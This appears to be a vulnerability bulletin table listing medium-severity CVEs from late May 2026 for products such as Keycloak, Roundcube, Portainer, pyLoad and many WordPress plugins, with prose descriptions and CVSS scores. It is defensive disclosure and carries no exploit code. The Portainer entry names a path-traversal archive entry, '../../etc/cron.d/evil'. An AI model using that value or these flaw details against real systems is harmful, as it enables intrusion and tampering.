| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Mongoapi). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle REST Data Services accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). | 2026-05-28 | 5.3 | CVE-2026-46830 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: General). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle REST Data Services accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). | 2026-05-28 | 5.3 | CVE-2026-46841 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle REST Data Services accessible data. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). | 2026-05-28 | 5.3 | CVE-2026-46842 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle REST Data Services. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). | 2026-05-28 | 5.3 | CVE-2026-46843 |
| Orthanc--Explorer 2 | A weakness has been identified in Orthanc Explorer 2 up to 1.12.0. The impacted element is an unknown function of the file WebApplication/src/components/StudyList.vue of the component URL Handler. This manipulation of the argument remote-source causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. Patch name: 21f78ce5da668bf5233efcd1896ec7c6e3b22eae. Applying a patch is the recommended action to fix this issue. | 2026-05-31 | 4.3 | CVE-2026-10173 |
| OTRS AG--OTRS | An improper default configuration in OTRS 2026.3.1 causes ticket article forwarding actions to enforce the "Is visible for customer" flag by default and prevent users from disabling it via the UI. This leads to unintended exposure of internal ticket information to the External Frontend This issue affects OTRS 2026.3.1 | 2026-05-31 | 5.7 | CVE-2026-48210 |
| OUSL-GROUP-BrinaryBrains--School Student Management System | A security vulnerability has been detected in OUSL-GROUP-BrinaryBrains School Student Management System up to 1e70e5ad1125b86dca4ee086eb6bb121f17708b6. Affected is the function marks of the file application/controllers/Parents.php. The manipulation of the argument param1 leads to improper control of resource identifiers. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10168 |
| oviva-ag--epa4all-client | epa4all-client is the Java Client for epa4all / ePA 3.0 in the Telematik Infrastruktur. In 1.2.4 and earlier, any network-reachable caller can write arbitrary documents to any patient's electronic health record accessible by the institution's SMC-B card. In a misconfigured deployment (e.g., following the production Docker example in the README), this is exploitable from the local network without credentials. | 2026-05-26 | 6.5 | CVE-2026-47672 |
| Patterns in the cloud--Autoship Cloud for WooCommerce Subscription Products | Missing Authorization vulnerability in Patterns in the cloud Autoship Cloud for WooCommerce Subscription Products allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Autoship Cloud for WooCommerce Subscription Products: from n/a through 2.14.0. | 2026-05-25 | 4.3 | CVE-2026-24527 |
| paulpela--My Email Shortcode | The My Email Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'subject' shortcode attribute in the 'my-email' shortcode in all versions up to, and including, 0.91 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8048 |
| peachpay--PeachPay Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net, NMI) | The PeachPay - Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net, NMI) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.120.46. This is due to missing or incorrect nonce validation on the peachpay_stripe_handle_admin_actions function. This makes it possible for unauthenticated attackers to permanently delete all stored Stripe credentials - including publishable keys, secret keys, webhook secrets, and Apple Pay configuration - from the WordPress database, disabling Stripe payment processing for the store via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-28 | 4.3 | CVE-2026-9618 |
| PickPlugins--Team Showcase | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Team Showcase allows Stored XSS. This issue affects Team Showcase: from n/a through 1.22.28. | 2026-05-25 | 6.5 | CVE-2025-62745 |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, Portainer's backup restore feature accepts a .tar.gz archive and extracts it to a target directory on the server. The extraction function (ExtractTarGz in api/archive/targz.go) constructed output paths using filepath.Clean(filepath.Join(outputDirPath, header.Name)). This combination does not prevent directory traversal - a tar entry named ../../etc/cron.d/evil resolves to a path outside the extraction root, so a crafted archive can write files to arbitrary locations on the server filesystem. This vulnerability is fixed in 2.33.8. | 2026-05-28 | 5.5 | CVE-2026-44885 |
| posimyththemes--The Plus Addons for Elementor Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce | The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'carousel_direction' parameter of the Carousel Anything widget in versions up to, and including, 6.4.15 This is due to insufficient output escaping in the render() function, where the carousel_direction value is placed into an unquoted HTML attribute (dir=) allowing attribute injection despite the use of esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-29 | 6.4 | CVE-2026-9243 |
| Prasad Kirpekar--WP Meta and Date Remover | Missing Authorization vulnerability in Prasad Kirpekar WP Meta and Date Remover allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Meta and Date Remover: from n/a through 2.3.6. | 2026-05-27 | 4.3 | CVE-2026-49051 |
| prolix-oc--Lumiverse | Lumiverse is a full-featured AI chat application. Prior to 0.9.7, consumeNonce() only checks that the module-level variable is set and unexpired. It does not validate any value from the incoming HTTP request or bind the nonce to the admin's session. If the admin's auth.api.signUpEmail() call fails before the before hook fires (e.g. BetterAuth rejects a duplicate email at the validation layer), the nonce is set but never consumed. Any POST /api/auth/sign-up/email request that arrives during the remaining window registers successfully regardless of who sent it. An attacker who can observe or predict when the admin is creating users (must be a dupplicate user) can race the 10-second window to register an unauthorized account. This vulnerability is fixed in 0.9.7. | 2026-05-26 | 4.8 | CVE-2026-44443 |
| pyload--pyload | pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the fix for CVE-2026-33509 prevents setting storage_folder inside PKGDIR or userdir, but does NOT protect the Flask session directory (/tmp/pyLoad/flask). An authenticated attacker can set storage_folder to the session directory and download session files of other users via /files/get/, leading to account takeover. This vulnerability is fixed in 0.5.0b3.dev100. | 2026-05-28 | 6.5 | CVE-2026-45306 |
| pyload--pyload | pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the PREREQFUNCTION-based private IP check was not applied to HTTPRequest (used by the parse_urls API). An authenticated attacker can supply a URL pointing to an attacker-controlled server that responds with a 302 redirect to an internal/private IP address, bypassing the is_global_host() check on the initial URL. This vulnerability is fixed in 0.5.0b3.dev100. | 2026-05-28 | 5 | CVE-2026-46561 |
| QianFox--FoxCMS | A vulnerability was identified in QianFox FoxCMS up to 1.2.6. This affects the function Edit of the file Admin.php. The manipulation leads to weak password recovery. The attack can be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-27 | 4.7 | CVE-2026-9609 |
| rahulbhangale--WP Promoter | The WP Promoter plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 6.1 | CVE-2026-8906 |
| rahulbhangale--WP Promoter | The WP Promoter plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reset_stats() function in versions up to, and including, 1.3. The function is hooked to both the wp_ajax_wpp-reset_stats and wp_ajax_nopriv_wpp-reset_stats actions and contains no authentication, authorization, or nonce validation. This makes it possible for unauthenticated attackers to reset the plugin's bar and popup statistics by deleting the wpp_bar and wpp_popup options. | 2026-05-27 | 5.3 | CVE-2026-9014 |
| rankmath--Rank Math SEO AI SEO Tools to Dominate SEO Rankings | The Rank Math SEO - AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the update_site_editor_homepage function in all versions up to, and including, 1.0.271. This makes it possible for unauthenticated attackers to modify several plugin settings including homepage title, meta description, breadcrumbs label, and social media metadata, which can have severe impact on SEO rankings and display malicious content across all site pages where breadcrumbs are used. | 2026-05-29 | 5.3 | CVE-2025-12714 |
| rchmura--GoStats for WordPress | The GoStats for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the gostats_manage() function. This makes it possible for unauthenticated attackers to update the plugin's settings (gostats_siteid and gostats_server options) via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8943 |
| realmag777--FOX Currency Switcher Professional for WooCommerce | The FOX - Currency Switcher Professional for WooCommerce plugin for WordPress is vulnerable to Authorization Bypass Through User-Controlled Key in all versions up to and including 1.4.6. This is due to the `get_value()` function in `classes/fixed/fixed_user_role.php` trusting the attacker-controlled `$_REQUEST['wooc_order_user_roles']` parameter to determine the user's role context for role-based price resolution without any validation, allowing it to override the legitimate role data derived from the authenticated user's session object via `$user->roles`. This makes it possible for authenticated attackers, with Subscriber-level access and above, to impersonate higher-privileged roles - such as wholesale customer or administrator - and obtain discounted or otherwise restricted pricing that should not be available to their actual role. This vulnerability only has practical impact when the fixed user-role pricing feature is enabled and at least one product has a privileged-role price configured. | 2026-05-28 | 4.3 | CVE-2026-9241 |
| Recorp--Export WP Page to Static HTML/CSS | Cross-Site Request Forgery (CSRF) vulnerability in Recorp Export WP Page to Static HTML/CSS allows Cross Site Request Forgery. This issue affects Export WP Page to Static HTML/CSS: from n/a through 6.0.0. | 2026-05-25 | 6.5 | CVE-2026-24574 |
| Red Hat--Multicluster Engine for Kubernetes | ACM/MCE assisted-service writes raw referenced pull-secret contents into `InfraEnv.status.conditions[].message` when pull-secret validation fails. A namespace principal with the stock `view` ClusterRole cannot directly read Secrets, but can read `InfraEnv` objects and recover the referenced Secret's `.dockerconfigjson` data from status. This bypasses the Kubernetes/OpenShift RBAC separation between read-only namespace viewers and Secret readers. In the reproduced proof, the same ServiceAccount was denied `get` and `list` on Secrets, but recovered synthetic pull-secret `username`, `password`, `email`, and base64 `auth` fields through `InfraEnv.status`. | 2026-05-29 | 6.3 | CVE-2026-10101 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. An authenticated user with low privileges can exploit this vulnerability by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. When the token exceeds a 4000-character limit, it is silently dropped, causing the system to fall back to client credentials. This allows the user to gain the permissions of the client's service account, leading to privilege escalation. | 2026-05-27 | 6.8 | CVE-2026-9704 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak's Client Policies, specifically within the `org.keycloak.protocol.oidc` component. When certain condition providers (client-type, client-roles, client-attributes, client-scopes) are used to enforce security restrictions, the `reject-ropc-grant` executor is silently bypassed. This allows an unauthenticated remote attacker to obtain tokens via a Resource Owner Password Credentials (ROPC) grant, even when a policy is explicitly configured to block it. This bypass can lead to unauthorized access and information disclosure. | 2026-05-28 | 6.5 | CVE-2026-9792 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. An authenticated administrator with the `manage-clients` role can exploit a Time-of-check to time-of-use (TOCTOU) vulnerability in the name-based admin role checks. This allows the attacker to escalate their privileges to `realm-admin` for all users within the realm, granting them extensive control over the system. The composite role relationship persists even after the attacker's own permissions are revoked and across system reboots. | 2026-05-28 | 6.5 | CVE-2026-9796 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. When revokeRefreshToken=true is enabled and persistent session storage is in use, a server restart can reset internal timing mechanisms. This allows a remote attacker, who has previously captured a user's refresh token, to replay that token even after it has been revoked. Successful exploitation grants the attacker unauthorized access to the victim's account, potentially leading to information disclosure or privilege escalation. | 2026-05-28 | 6.8 | CVE-2026-9802 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. When a JSON Web Encryption (JWE) encrypted request object is submitted, Keycloak may incorrectly process unsigned claims if the decrypted content is raw JSON, bypassing the configured signature policy. This allows a remote attacker to submit unauthorized claims, leading to a compromise of data integrity within the OpenID Connect (OIDC) authorization flow. While a redirect URI allowlist acts as a compensating control, this vulnerability violates OIDC Core and Financial-grade API (FAPI) signing requirements. | 2026-05-28 | 5.9 | CVE-2026-9793 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. A remote, unauthenticated attacker can exploit this vulnerability by sending specially crafted SOAP requests to the SAML ECP (Security Assertion Markup Language Enhanced Client or Proxy) endpoint with varying client IDs. By observing distinct faultstrings in the responses, the attacker can determine the client's protocol type, leading to information disclosure. | 2026-05-28 | 5.3 | CVE-2026-9794 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak's ClientRegistrationAuth component. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted POST request with a malformed 'Authorization: Bearer' header to any client registration endpoint. This can lead to an ArrayIndexOutOfBoundsException, causing the server to return an HTTP 500 error and resulting in a Denial of Service (DoS) for the affected service. | 2026-05-28 | 5.3 | CVE-2026-9803 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak, an open-source identity and access management solution. When a client application is configured to accept broad redirect Uniform Resource Identifiers (URIs), a remote attacker can manipulate the authentication process by crafting a special web address. If a user clicks this link, the client application might incorrectly prioritize attacker-controlled information over legitimate data. This vulnerability, known as HTTP parameter pollution, could allow an attacker to bypass security measures or gain unauthorized access to resources. | 2026-05-27 | 4.2 | CVE-2026-9689 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. An authenticated user with existing organization membership can exploit this flaw by accessing user-facing APIs, such as the account API or by requesting an OpenID Connect (OIDC) token with the 'organization' scope. This allows organization metadata to be disclosed in tokens, even after an administrator has explicitly disabled the Organizations feature, potentially leading to incorrect authorization decisions by resource servers. | 2026-05-28 | 4.3 | CVE-2026-9791 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak, an open-source identity and access management solution. When a user account is temporarily locked due to repeated failed login attempts, an attacker with valid client credentials can exploit the Client-Initiated Backchannel Authentication (CIBA) flow to bypass this brute-force protection. This allows continued authentication attempts and token issuance even when the account should be locked, potentially enabling further unauthorized access attempts. | 2026-05-28 | 4.3 | CVE-2026-9798 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. A remote attacker with high privileges, such as a realm administrator configuring a malicious Lightweight Directory Access Protocol (LDAP) server or an attacker compromising an upstream LDAP server, could exploit this vulnerability. By sending a malformed LDAP password policy response during a password authentication request, the attacker can trigger an OutOfMemoryError. This causes the Keycloak Java Virtual Machine (JVM) to terminate, leading to a denial of service (DoS) for all realms on the affected node. | 2026-05-28 | 4.9 | CVE-2026-9801 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Samba's vfs_worm module. The module is intended to provide write-once, read-many (WORM) protections by preventing modification of files after a configurable grace period. Due to insufficient validation during rename operations, an authenticated user with write access to a share could overwrite a protected file by renaming a newly created file over the existing WORM-protected file. | 2026-05-27 | 6.5 | CVE-2026-2340 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in glib-networking. A remote attacker can exploit this vulnerability by presenting a specially crafted certificate chain to an application that uses glib-networking with the GnuTLS backend enabled and performs certificate verification. This crafted chain, which contains circular issuer relationships, can cause an infinite loop during certificate verification. The unbounded traversal consumes excessive CPU resources, leading to a denial of service for the affected process or worker. | 2026-05-28 | 4.3 | CVE-2026-10028 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libsoup. A remote attacker could exploit an unsigned to signed conversion error in the `soup_body_input_stream_read_chunked()` function by sending a malicious HTTP request. This vulnerability occurs when libsoup operates behind a non-libsoup proxy server or as a proxy in front of a non-libsoup backend server. Successful exploitation can allow an attacker to bypass security controls, poison web caches, or gain unauthorized access. | 2026-05-29 | 4.8 | CVE-2026-6324 |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in gnutls. An off-by-one error exists in the PKCS#12 bag element bounds check. This vulnerability allows an remote attacker to write past the internal array of a PKCS#12 bag when appending to a bag that already contains 32 elements. This memory corruption could lead to a denial of service (DoS) or potentially other unspecified impacts. | 2026-05-26 | 5.3 | CVE-2026-42015 |
| Red Hat--Red Hat Quay 3 | A flaw was found in the Quay config-tool's LDAP and SMTP validation functions. An attacker with config editor access can exploit these functions, which make outbound connections to user-supplied endpoints without proper IP or host filtering. This allows the attacker to perform internal network reconnaissance from the Quay pod's network position, potentially mapping the internal network infrastructure. | 2026-05-29 | 4.1 | CVE-2026-10052 |
| rexxars--eventsource-encoder | eventsource-encoder encodes events as well-formed EventSource/Server Sent Event (SSE) messages. Prior to 1.0.2, eventsource-encoder does not sanitize the event or id fields of an EventSourceMessage before serializing them. An attacker who controls either field can inject arbitrary Server-Sent Events line terminators (\n, \r, or \r\n) and thereby forge additional SSE fields or entire messages on the stream. This vulnerability is fixed in 1.0.2. | 2026-05-26 | 5.8 | CVE-2026-44214 |
| Roundcube--Webmail | In Roundcube Webmail 1.6.x between 1.6.14 and 1.6.16 and 1.7.x before 1.7.1, remote image blocking was not honored for URLs pointing to local/private destinations, which may lead to information disclosure or privilege escalation via a text/html email message. | 2026-05-25 | 6.5 | CVE-2026-48845 |
| Roundcube--Webmail | In Roundcube Webmail 1.6.x before 1.6.16 and 1.7.x before 1.7.1, the remote image blocking feature can be bypassed via a crafted CSS var() value in an e-mail message, which may lead to information disclosure or access-control bypass. | 2026-05-25 | 6.5 | CVE-2026-48846 |
| Roundcube--Webmail | In Roundcube Webmail 1.6.x before 1.6.16 and 1.7.x before 1.7.1, an unsanitized subject field in the draft restored value could lead to stored XSS/HTML/CSS injection on shared mailboxes. | 2026-05-25 | 4.4 | CVE-2026-48849 |
| Ruben Garcia--GamiPress | Missing Authorization vulnerability in Ruben Garcia GamiPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GamiPress: from n/a through 7.6.3. | 2026-05-25 | 5.3 | CVE-2026-24546 |
| ruchit47--Events In City | The Events In City plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'org-events' shortcode in versions up to, and including, 3.0. This is due to insufficient input sanitization and output escaping on user supplied attributes (such as 'organizer_id', 'width', 'height', 'transparency', 'header', 'border', and 'layout') in the org_event_scode() function. The attribute values are concatenated directly into HTML attributes without esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8898 |
| saadiqbal--Post Snippets Custom WordPress Code Snippets Customizer | The Post Snippets plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.0.19. This is due to insufficient output escaping of imported snippet content when rendering JavaScript variables in the post editor. Specifically, the `jqueryUiDialog()` method in `WPEditor.php` embeds snippet content directly into JavaScript string literals without escaping double quotes (the quote-escaping code on line 214 is commented out). When snippets are imported via the Import/Export feature, the content bypasses WordPress's `wp_magic_quotes()` (which would otherwise add protective backslashes), allowing double quotes in snippet content to break out of the JavaScript string context. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts via a malicious import file that execute whenever any administrator accesses a post editor page. Please note that this does not affect single-site installations as administrators already have the `unfiltered_html` capability. | 2026-05-29 | 4.4 | CVE-2026-7430 |
| safedep--gryph | Gryph provides a security layer for AI coding agents. Prior to 0.7.0, Gryph implements logging levels that determine what content is logged to a local sqlite database. The README incorrectly mentions that the default log level is minimal while it is standard. Source code review shows sensitive file-write content remains in the stored payload as ContentPreview, OldString, or NewString at the default standard logging level and at full. This leads to logging of potentially sensitive file content in the local sqlite database, violating Gryphs sensitive file filter and log level contracts. This vulnerability is fixed in 0.7.0. | 2026-05-27 | 5.5 | CVE-2026-45046 |
| samiullah-kaifi--Islamic Database | The Islamic Database plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'islamicDB-roqya' shortcode in versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user-supplied 'width' and 'height' shortcode attributes within the islamicDB_sc_quran_qari_roqya() function, which are concatenated directly into HTML iframe attribute values. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8845 |
| SAP_SE--SAP Gateway | The SAP Gateway allows attackers to inject content into error messages, potentially leading to disclosure of request artefacts (e.g., regex patterns) and revealing underlying URI parsing logic. Leading to low impact on confidentiality. Integrity and availability are unaffected. | 2026-05-26 | 4.3 | CVE-2026-44749 |
| ScadaBR--ScadaBR | A reflected cross-site scripting issue exists in URL handling. | 2026-05-28 | 6.1 | CVE-2026-9646 |
| scanwith--Visual Ping | Visual Ping 0.8.0.0 contains a buffer overflow vulnerability in input field handling that allows local attackers to crash the application by supplying oversized data. Attackers can inject malicious payloads exceeding 4108 bytes into the Host, Time Out, Packet Size, Pause, or Loops fields to trigger a denial of service condition. | 2026-05-25 | 6.2 | CVE-2018-25369 |
| scottpaterson--Contact Form 7 PayPal & Stripe Add-on | The Contact Form 7 - PayPal & Stripe Add-on plugin for WordPress is vulnerable to Payment Bypass via Insufficient Verification of Data Authenticity in all versions up to, and including, 2.4.9. Although `cf7pp_paypal_ipn_handler()` correctly validates IPN authenticity by posting back to PayPal with `cmd=_notify-validate`, it fails to compare the IPN payload's `mc_gross` (payment amount), `mc_currency`, or `receiver_email` fields against the corresponding stored order values before passing the attacker-controlled `invoice` field directly to `cf7pp_complete_payment()`, which marks the order completed after only an integer cast with no amount verification. This makes it possible for unauthenticated attackers to mark arbitrary high-value pending orders as fully paid by making a minimal real PayPal payment and crafting an IPN whose `invoice` parameter references the targeted order, effectively completing purchases without tendering the required payment amount. | 2026-05-29 | 5.3 | CVE-2026-9189 |
| SePay team--SePay Gateway | Missing Authorization vulnerability in SePay team SePay Gateway allows Retrieve Embedded Sensitive Data. This issue affects SePay Gateway: from n/a through 1.1.20. | 2026-05-25 | 6.5 | CVE-2026-42763 |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to generic SQL Injection via the 'order' parameter in all versions up to, and including, 3.28.28 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Exploitation requires that the attacker also supply a valid 'orderby' parameter in the same request, as this is necessary to reach the vulnerable code path that processes and concatenates the 'order' value into the SQL query. | 2026-05-29 | 4.9 | CVE-2026-10039 |
| shopperlabs--shopper | Shopper is a Headless e-commerce Admin Panel. Prior to 2.8.0, Sub-form Livewire components used in the product editor (Edit, Inventory, Seo, Shipping, Files) had no authorization on their store() method. Any authenticated panel user, regardless of role, could mutate any product's pricing, stock, SEO metadata, shipping dimensions, and attached media without holding edit_products. The affected components accepted the product ID as a public Livewire property without #[Locked], so an attacker could also target an arbitrary product by tampering with the wire payload from the client. This vulnerability is fixed in 2.8.0. | 2026-05-29 | 6.5 | CVE-2026-47742 |
| shopperlabs--shopper | Shopper is a Headless e-commerce Admin Panel. Prior to 2.8.0, the admin tables for PaymentMethods, Currencies and Carriers exposed inline toggles and per-record actions (enable, disable, edit, delete) that were rendered for any authenticated panel user without checking the corresponding per-action permission. A low-privilege user could disable every payment method on the store, disable or alter the default currency, or disable carriers. The impact is a full denial of checkout and pricing integrity loss, reachable by any authenticated user. This vulnerability is fixed in 2.8.0. | 2026-05-29 | 6.5 | CVE-2026-47745 |
| shopperlabs--shopper | Shopper is a Headless e-commerce Admin Panel. Prior to 2.8.0, CreateOrderFromCartAction::execute previously created the Order row before checking and incrementing the discount's total_use counter. Under concurrent checkout pressure (Black Friday, flash sale, viral coupon), the global usage_limit was silently exceeded: orders were committed with the discount fully applied to price_amount while the counter blocked at usage_limit. The merchant had no signal that an over-redemption had occurred. This vulnerability is fixed in 2.8.0. | 2026-05-29 | 5.9 | CVE-2026-47741 |
| shra--Genzel breadcrumbs | The Genzel breadcrumbs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on the _options_page function. This makes it possible for unauthenticated attackers to update the plugin's breadcrumb configuration, including templates, delimiter, home label, home URI, and breadcrumb rules via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8708 |
| Significant-Gravitas--AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Prior to 0.6.59, POST /api/blocks/{block_id}/execute endpoint executes blocks without consuming any credits, regardless of the user's balance. The credit check that exists in the graph execution path (manager.py) is never reached when blocks are called directly via the external API, allowing unlimited free execution of all blocks. This vulnerability is fixed in 0.6.59. | 2026-05-28 | 5.4 | CVE-2026-45023 |
| silvercover--myLinksDump | The myLinksDump plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link_title' parameter in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-05-27 | 4.8 | CVE-2026-2288 |
| simonailie--Search Simple Fields | The Search Simple Fields plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.2. This is due to missing or incorrect nonce validation on the search_simple_fields_options() function in functions_admin.php. This makes it possible for unauthenticated attackers to modify the plugin's settings - including post types to search in, custom fields, media fields and the custom media function name - via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8939 |
| Sitejo--HaPe PKH | HaPe PKH 1.1 contains a cross-site request forgery vulnerability that allows attackers to change administrator passwords by submitting forged requests to the user update endpoint. Attackers can craft malicious forms targeting the aksi_user.php script with parameters like id_user, password, and level to modify admin credentials without authentication. | 2026-05-29 | 5.3 | CVE-2018-25387 |
| smtp2go--SMTP2GO for WordPress Email Made Easy | The SMTP2GO for WordPress - Email Made Easy plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.16.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to truncate all SMTP2GO log records from the database or download a CSV export of all SMTP log data including recipient addresses, sender addresses, message subjects, and API response data. | 2026-05-28 | 4.3 | CVE-2026-7621 |
| smub--Easy Digital Downloads eCommerce Payments and Subscriptions made easy | The Easy Digital Downloads plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.7. This is due to missing nonce verification in the `handle_oauth_redirect()` function, which is registered on the `admin_init` hook and processes Square OAuth tokens from a user-supplied GET parameter without any CSRF token validation. This makes it possible for unauthenticated attackers to overwrite the store's Square payment gateway credentials by tricking a logged-in administrator into clicking a crafted link, potentially resulting in payment account hijacking. | 2026-05-28 | 4.3 | CVE-2026-7533 |
| smub--PDF Embedder | The PDF Embedder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.9.3 via the enqueue_block_assets. This makes it possible for authenticated attackers, with contributor-level access and above, to extract configuration data. License key exposure occurs when the premium add-on is also installed and has saved a key; on Lite-only installations, the exposed data is limited to non-sensitive viewer configuration values such as width, height, toolbar settings, usage tracking, and plan. | 2026-05-28 | 4.3 | CVE-2026-7526 |
| Soroush--Soroush IM Desktop App | Soroush IM Desktop App 0.17.0 contains an authentication bypass vulnerability that allows local attackers to remove passcodes by injecting pre-encrypted database entries using a constant encryption key. Attackers can inject malicious database records into the application's database files to unlock the client and access all stored data, chats, images, and files without knowing the original passcode. | 2026-05-25 | 6.8 | CVE-2018-25361 |
| SourceCodester--CET Automated Grading System with AI Predictive Analytics | A security flaw has been discovered in SourceCodester CET Automated Grading System with AI Predictive Analytics 1.0. This affects an unknown function. Performing a manipulation results in cross-site request forgery. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-26 | 4.3 | CVE-2026-9582 |
